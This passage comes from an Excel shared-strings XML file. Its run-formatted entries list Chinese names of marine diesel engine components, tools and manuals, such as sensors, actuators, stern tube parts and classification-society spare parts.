    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击阀壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击销板手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗，主机，试验台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗程序</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗容器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗设备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲洗套件使用说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲液式补偿器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>充气工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>充液式指示器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>抽出工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>抽出器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲头，雾化器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>抽出器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>抽取器，梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形接头滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出错报警铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口管列表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口恒温阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口恒温阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出气凸轮，轮廓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>除</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>NOX</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>除气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>储油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>处理工艺</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>触发环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>触发环测速器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>触发环系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>触头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传动布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传动轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传动装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器安装后再加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器标签位置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器插槽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器磁盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器磁体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器的布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器定距环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器放大器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器接线指导手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器壳体，铸造</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器匹配器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器适配器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器调整和测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器限制器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器装置位置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传输泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船舶装置安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船级规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船级社</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船级社备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船级社备件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船级社规格书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船级社认可文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船级社要求备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船桥安全控制盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船桥操纵盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船桥负荷削减面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船上安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船艏侧推装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船尾轴管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船尾轴管法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船尾轴管基础部分</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船尾轴管油系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船艉管密封说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船用柴油离心分油机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船用柴油模数</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船用监视器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>串行接口模块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>串洗，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ME</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>串洗滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磁轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>次要工具箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刺破阀工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刺破阀用管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>从动装置操纵盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>从主机上拆卸气缸单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粗滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动泵锁止</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>流量逆止阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器滑油主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器活塞，内部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
